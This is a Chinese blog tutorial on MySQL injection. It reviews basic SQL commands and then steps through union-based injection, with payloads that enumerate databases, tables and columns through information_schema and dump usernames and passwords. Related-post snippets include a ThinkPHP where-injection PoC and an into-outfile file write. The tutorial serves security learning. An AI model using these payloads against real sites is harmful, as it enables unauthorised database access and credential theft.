Mysql注入

已于 2022-11-17 22:12:04 修改
阅读量285 收藏
点赞数 1
分类专栏: WEB安全 文章标签: mysql 数据库 sql
于 2022-11-17 22:02:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44030371/article/details/127912806
版权

一、常用数据库的增删改查

查看库-创建库
show databases;   查看系统数据库有哪些
use mysql;     使用mysql数据库
create database xy;  创建xy数据库
drop database xy;   删除xy数据库

选择库-创建admin表
use xy;
show tables;    查看数据库里面的表
create table admin(id int,username char(50),password char(50));   创建一个admin表,增加三个列名id username password

查询admin表内容
select * from admin;  查询admin表里的所有内容
select * from admin where id=1;  指定条件查找,查找id为1一行数据
select username,password from admin;  查询admin表的username,password两列数据

写入数据进admin表
insert into admin(id,username,password)values(1,‘admin’,‘admin888’);  插入一行数据
insert into admin(id,username,password)values(1,‘admin’,‘admin888’),(1,‘root’,‘root888’);   同时插入两行数据
insert into admin(id,username,password)values(1,‘admin’,mad5(‘admin888’));  调用md5函数对插入的数据加密

修改admin表数据
uodate admin set password=‘123123’ where id=1;  将id为1这行password改成123123

删除admin表数据
delete from admin where id=1;  删除id为1这一行

删除表
drop table admin;  删除admin表

注入常用函数
user() version() database() @@datadir @@dasedir

二、注入数据类型的区分

int 整型
select * from users where id=1
sting 字符型
select * from users where username=‘admin’
like 搜索型
select * from news where title like '%标题%

三、SQL注入过程

union联合注入

  1. 判断是否存在注入:
    int 整型
    and 1=1 正常
    and 1=2 不正常 则存在注入
    sting 字符型
    加单引号 ’ 报错 使用注释# 正常显示 则存在注入
  2. 猜字段数
    ?id=1 order by 3–+ 回显正常
    ?id=1 order by 4–+ 回显错误 字段则=3
  3. 查询数据库名
    ?id=-1 union select 1,database(),3–+ 查询数据库
    ?id=-1 union select 1,database(),version()–+ 查询数据库版本
  4. 查询表名
    ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
  5. 查询列名
    ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+
  6. 查询数据
    ?id=-1 union select 1,2,group_concat(username,‘=’,password) from users–+

盲注

判断注入方法一样 盲注的区别在于注入不会回显数据

南—
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ThinkPHP3.2.3_where注入
11-21 523
漏洞环境 ThinkPHP3.2.3 漏洞代码<?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function index(){ $data = M('users')->find(I('GET.id')); var_dump($data); } } POC/?id[where]=1
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
SQL注入之WHERE 子句中的 SQL 注入漏洞
杳若的博客
07-21 7176
Burp练兵场之SQL注入
SQL注入MYSQL注入
av11566的博客
04-19 7093
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
ThinkPHP3.2.3 where注入
LiBai'S BLOG
12-04 4509
ThinkPHP3.2.3 where注入断点调试强转类型进入函数 在 D:\phpstudy_pro\WWW\thinkphp3\Application\Home\Controller下的IndexController.class.php添加代码 先用正常id去走一遍流程,然后再使用payload http://127.0.0.1/thinkphp3/index.php/home/index/getuserid?id=1)%20and%20database()=%27thinkphp3%27%20-
MySQL注入详解
weixin_48450741的博客
08-03 2553
MySQL注入知识点信息收集同数据库判断注入报错猜解准备查询信息查询指定数据库名下的表名信息查询指定表名下的列名信息查询指定数据跨数据库获取所有数据库名获取指定数据库名下的表名信息获取指定表名下的列名信息获取数据 知识点 MySQL 5 以上存在一个自带的数据库information_schema,记录所有的数据库名,表名,列名 information_schema.tables:记录所有表名信息的表 information_schema.columns:记录所有列名信息的表 table_name:表名 c
第01篇:MySQL注入点写WebShell的5种方式1
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql注入环境
01-16
MySQL注入环境是一个重要的网络安全话题,主要关注的是数据库系统的安全性和数据保护。在本文中,我们将深入探讨MySQL注入的原理、如何在Linux或Windows环境中搭建测试环境,以及如何使用sqli-labs进行实战演练。 ...
MYSQL 注入天书
03-04
MYSQL 注入天书,Sqli-labs 使用手册,结合Sqli-labs讲解Mysql注入方法。
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
Mysql注入详解
peakerli的专栏
12-03 860
<br />时刻绷紧安全这根弦<br /> <br />原文:http://laoxiege.blog.sohu.com/115453521.html<br /> <br />前言<br />   2003年开始,喜欢脚本攻击的人越来越多,而且研究ASP下注入的朋友也逐渐多了起来,我看<br /> 过最早的关于SQL注入的文章是一篇99年国外的高手写的,而现在国外的已经炉火纯青了,国内才<br /> 开始注意这个技术,由此看来,国内的这方面的技术相对于国外还是有一段很大差距,话说回来<br /> ,
Mysql 下 Insert、Update、Delete、Order By、Group By注入
weixin_33815613的博客
07-21 152
Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or ''...
MySQL注入
qq_45031509的博客
04-13 956
mysql注入 1.信息收集 1)操作系统:@@version_compile_cs(不同的系统对数据库操作语句的大小写区分) 2)数据库名:database() 3)数据库用户:user()(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。 4)数据库版本:version()(选择注入) 5)其他网站路径(进行文件读取,为高权限读取做准备) 2.数据注入 1)低版本(暴力或结合读取查询,表名,列名用猜的方式) 2)高版本(information
mysql 注入
qq_58970968的博客
07-31 1941
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
注入漏洞-sql注入
热门推荐
一个很酷的人
04-30 4万+
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的...
SQL注入解决动态拼接where条件个数不固定
qq_28219067的博客
11-22 3513
只需一个ArrayList String sqlWhere = ""; List&lt;String&gt; paramList = new ArrayList&lt;&gt;(); if(parone!= null &amp;&amp; !parone.equals("")){ sqlwhere +=" and parone like ? "; paramList.add..
SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
mysql 注入扫描
最新发布
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用程序的开发者和管理员来说,MySQL注入扫描是非常重要的。MySQL注入扫描可以通过自动化工具进行,也可以通过手动检测进行。 在进行MySQL注入扫描时,需要仔细分析网站或应用程序的输入点,例如表单输入、URL参数等,以及与MySQL数据库的交互。通过模拟攻击者的注入行为,可以检测出网站或应用程序的漏洞点,并进一步修复和加固系统的安全性。 为了有效进行MySQL注入扫描,可以借助一些自动化工具,例如Sqlmap、Netsparker、Acunetix等,这些工具可以自动检测网站或应用程序的漏洞点,并生成报告提醒管理员修复漏洞。同时,也需要对数据库进行严格的权限控制,以及对用户输入进行严格的验证和过滤,以防止注入攻击。 总的来说,MySQL注入扫描对于保障网站和应用程序的安全性是非常必要的,需要持续进行检测和修复漏洞,从而有效防范潜在的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值